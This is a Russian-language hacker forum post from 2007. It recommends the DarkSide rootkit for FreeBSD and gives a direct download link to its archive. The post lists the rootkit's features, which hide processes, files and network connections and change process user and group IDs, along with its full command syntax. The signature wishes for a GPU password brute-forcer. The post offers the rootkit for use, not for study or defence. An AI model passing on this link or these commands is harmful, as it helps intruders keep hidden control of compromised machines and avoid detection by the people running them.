05.04.2007, 00:41
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
С нами:
10129286
Репутация:
1477
|
|
Меня тут спросили ещё по какие-нибудь руткиты для FreeBSD - рассказываю. От замечательной команды lbyte, которая, к сожалению, уже больше не существует, был такой релиз под названием DarkSide - RootKit для FreeBSD. О нём даже писали в каком-то из старых номеров журнала Хакер. Конечно, маловероятно, что он потянет под 5й и 6й веткой, но попытка не пытка, да и модификацию исходников ещё никто тоже не отменял. Скачать можно здесь: http://lbyte.void.ru/rel/files/darkside-0.2.3.tar.gz
Лично тестировал на FreeBSD 4.6 где-то в 2003 году...
Функционал стандартный:
1)сокрытие процессов и их потомков
2)сокрытие файлов и директорий
3)сокрытие сетевых соединений путём модификасии TCP/IP стека.
Использование:
Код:
hideproc <pid> - скрыть процесс, имеющий PID= <pid>
unhideproc <pid> - показать процесс с PID= <pid>
printprocs - показать все скрытые процессы
changeuid <pid> <uid> - изменить uid процесса с PID= <pid> на <uid>
changeeuid <pid> <euid> - изменить euid процесса с PID= <pid> на <euid>
changegid <pid> <gid> - изменить gid процесса с PID= <pid> на <gid>
changeegid <pid> <egid>- изменить egid процесса с PID= <pid> на <egid>
hidefile <name> - скрыть все файлы с именем <name>
unhidefile <name> - показать все файлы с именем <name>
printfiles - показать вс скрытые файлы
hideport <num> - скрыть все соединения с портом <num>
unhideport <num> - рыскрыть все соединения с портом <num>
hidehost <ip> - скрыть все соединения с <ip>
unhidehost <ip> - раскрыть все соединения <ip>
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|